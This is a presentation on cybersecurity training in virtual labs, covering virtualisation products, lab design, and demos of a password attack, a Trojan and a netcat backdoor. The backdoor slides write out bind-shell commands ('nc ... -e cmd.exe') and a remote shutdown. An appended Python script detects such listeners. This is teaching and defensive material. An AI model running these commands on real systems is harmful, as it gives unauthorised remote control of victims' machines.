Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu
Areas to be covered • Brief introduction to virtualization • General Benefits of virtualization • Dominant vendors and common products • Lab Architecture • Lab technical support • Lab Exercise Demonstration • Summary • Questions
Introduction to Virtualization • A software entity can have and share access to the underlying hardware resources. • The software entity can be an application, a network or a virtual machine. • Humans can interact with it as if it were a separate entity (e.g. a separate physical machine) • A software layer (the hypervisor) exists that allows for the creation and deployment of virtual machines
General Benefits • Multiple guest operating systems can run on one physical machine • Higher productivity at lower cost • Additional energy and real estate (floor space) cost savings • Software testing before deployment (e.g. patches) • Fast restore from a snapshot in the event of a VM crash or corruption
Dominant Vendors and Common Products • VMware • vSphere, ESXi, vCloud Director • Citrix (Xen) • Xen is open source • The Citrix version (XenServer) has an excellent management interface • An alternative to the VMware product line • Linux Kernel-based Virtual Machine (KVM) • High potential but no well-developed management interface
Enterprise Class vs. Single-User Products • Enterprise class virtualization products • VMware vSphere, Citrix Xen and Linux KVM can • Create multiple virtual networks • Allow numerous connections to the servers • Allow the clustering of servers and provide a good management interface • Provide a way to authenticate users • Common products for single users • VMware Workstation, VMware Player etc. • Oracle VirtualBox • Microsoft Virtual PC
Lab Architecture • Consists of multiple physical servers • The group of servers is managed by a central server • The central server should be able to connect to an authentication server • A VPN might be needed for security • Choice between a web-based connection to the VM or an IP-based remote connection (RDP or SSH)
Lab Architecture Diagram http://www.cisco.com/en/US/solutions/collateral/ns340/ns517/ns224/ns668/net_implementation_white_paper0900aecd8053495a.html
Extra Notes on Lab Architecture • The number of physical servers should depend on the number of students and the storage you need • Cost increases with each additional server you add • Consider the technical support required for the system
Lab Support • Lab may require additional technical support from IT staff • Both Instructors and students may need help with connectivity • Students may require help with lab exercises • Consider having IT staff help with this area • Consider hiring teaching assistants or lab assistants to help with lab exercises
Potential Technical Issues • VPN connectivity • Firewall installed on client PCs • Internet security (antivirus) software installed on client PCs • User-based issues • Inexperienced users • Incorrectly applied instructions
Attacks • Online password attack (Windows) • Attempt to crack a password on a remote system • The victim will be a Windows system • Backdoor attack • An insider installs a malicious program that allows connections to be made to the victim system • Trojan attack • A malicious program that appears harmless but performs some other action
Online Password Attack (Windows) • Server Message Block (SMB) is used for file sharing • SMB clients and servers communicate about shared resources (SMB runs directly over TCP port 445; older hosts also use NetBIOS over TCP port 139) http://www.highteck.net/EN/Application/Application_Layer_Functionality_and_Protocols.html
Online Password Attack (Contd.) • Attacker's objective • Retrieve or discover a privileged user's password • Attack method • Automate a dictionary password attack against a Windows share • A custom script can and will be used • Mitigation/Prevention/Detection • Enforce an account lockout threshold (maximum logon attempts) • Security personnel should review the log files for repeated failed logons against one account
Online Password Attack Contd. (Demo) • Nmap scan of the network • Enumerate the shares on the Windows machines • Run a script that attempts to connect to a share with a privileged account • Each connection attempt uses the next password from the dictionary • Connect to the VM using a terminal application
Online Password Attack on Windows (Contd.) • Learning objectives • Importance of using a complex password • Importance of enforcing maximum logon attempts • Importance of renaming the administrator account • Understanding the effectiveness of social engineering • Knowing the username is half the battle • Aha moment! http://quite-rightly.blogspot.com/2011/07/congress-let-there-be-edison-light-bulb.html
Backdoor Attack • Attacker's objective • Execute remote commands on the victim system • Attack method • An insider installs a backdoor program on the victim machine • The backdoor listens for and accepts incoming connections http://technicaljones.com/index.php?page=91
Backdoor Attack Contd. • Mitigation/Prevention/Detection • Physical security reduces the risk • Anti-virus scans are also effective http://kyrionhackingtutorials.com/2010/10/what-are-backdoors/
Backdoor Attack Steps • Install the backdoor (netcat) on the victim computer • Configure the backdoor to accept incoming connections • Execute "nc -l -v -p 5555 -e cmd.exe" on the server (victim); the -e option exists only in netcat builds compiled with it, such as the classic Windows nc.exe • Connect to the victim machine from the attack machine • Execute "nc -vn <IP address> 5555" • Execute a command on the remote system from the attack machine • Execute "shutdown -r -t 20" to shut down and restart the victim system in 20 seconds
Trojan Attack • Attacker's objective • Successfully install or execute malware on the victim system • A Trojan installs malware while pretending to be legitimate software http://www.buzzle.com/articles/trojan-horse-virus-removal.html
Trojan Attack (Contd.) • Attack method • Malicious web downloads • Email attachments • Mitigation/Prevention/Detection • Up-to-date anti-virus definitions • User training
Take Home Message • Virtualization is useful for hands-on exercises • It provides the flexibility to create different lab environments • Cost is proportional to the number of students using the lab • Lab support is useful and should be planned for • Virtual labs help instructors achieve learning objectives and improve experiential learning
Questions • Any questions? • Email: chinedum.irrechukwu@umuc.edu
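Spotting the netcat listener from the steps above is the detection side the mitigation slide leaves to anti-virus; the following added example (not from the deck) parses the output of two built-in Windows commands, netstat -ano and tasklist /FO CSV /NH, and reports listening TCP ports whose owning process is not on an allow-list, together with any peer already connected to that port. The command output embedded below is constructed to match the demo (nc.exe listening on 5555 with one connected attack machine), and the allow-list of expected listeners is an assumption about the lab image.

```python
"""Find a netcat-style backdoor listener from the output of two built-in
Windows commands: netstat -ano and tasklist /FO CSV /NH. Added example, not
from the deck; the command output below is constructed, not captured."""
import csv
import io
import re
from typing import Dict, List, Set, Tuple

# Constructed 'netstat -ano' output: nc.exe (PID 3120) listening on 5555
# with the attack machine already connected.
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       876
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1204
  TCP    0.0.0.0:5555           0.0.0.0:0              LISTENING       3120
  TCP    192.168.56.10:5555     192.168.56.20:50122    ESTABLISHED     3120
  UDP    0.0.0.0:500            *:*                                    1096
"""

# Constructed 'tasklist /FO CSV /NH' output (image, PID, session, session#, memory).
TASKLIST_SAMPLE = """\
"System","4","Services","0","132 K"
"svchost.exe","876","Services","0","5,212 K"
"svchost.exe","1204","Services","0","7,940 K"
"lsass.exe","1096","Services","0","9,300 K"
"nc.exe","3120","Console","1","2,044 K"
"""

# Assumed baseline for the lab image: (image name, port) pairs that are
# expected to be listening. Anything else is reported.
EXPECTED_LISTENERS: Set[Tuple[str, int]] = {
    ("System", 445), ("svchost.exe", 135), ("svchost.exe", 3389),
}

# Matches TCP rows only; UDP rows have no state column and are skipped.
NETSTAT_TCP_ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+)\s+([A-Z_]+)\s+(\d+)\s*$")


def parse_tasklist_csv(text: str) -> Dict[int, str]:
    """Map PID -> image name from tasklist's CSV output."""
    pids: Dict[int, str] = {}
    for row in csv.reader(io.StringIO(text)):
        if len(row) >= 2 and row[1].isdigit():
            pids[int(row[1])] = row[0]
    return pids


def parse_netstat(text: str) -> List[dict]:
    """Extract TCP sockets (local address, port, peer, state, PID) from netstat -ano."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_TCP_ROW.match(line)
        if m:
            rows.append({"local": m.group(1), "port": int(m.group(2)),
                         "remote": m.group(3), "state": m.group(4), "pid": int(m.group(5))})
    return rows


def find_unexpected_listeners(netstat_text: str, tasklist_text: str,
                              expected: Set[Tuple[str, int]] = EXPECTED_LISTENERS) -> List[dict]:
    """Listening TCP ports whose (image, port) is not in the baseline, each with
    the remote peers currently connected to that port."""
    pids = parse_tasklist_csv(tasklist_text)
    rows = parse_netstat(netstat_text)
    findings = []
    for r in rows:
        if r["state"] != "LISTENING":
            continue
        image = pids.get(r["pid"], "<unknown>")
        if (image, r["port"]) in expected:
            continue
        peers = sorted(x["remote"] for x in rows
                       if x["state"] == "ESTABLISHED" and x["pid"] == r["pid"] and x["port"] == r["port"])
        findings.append({"port": r["port"], "pid": r["pid"], "image": image, "peers": peers})
    return findings


if __name__ == "__main__":
    for f in find_unexpected_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"port {f['port']} owned by {f['image']} (PID {f['pid']}), connected peers: {f['peers']}")
```

On the constructed output the only finding is port 5555 owned by nc.exe with the attack machine's address as its connected peer; the expected RDP, RPC and SMB listeners are suppressed by the baseline. On a real lab VM the two strings would come from running the commands and capturing their output, and the baseline should be taken from a clean copy of the same image.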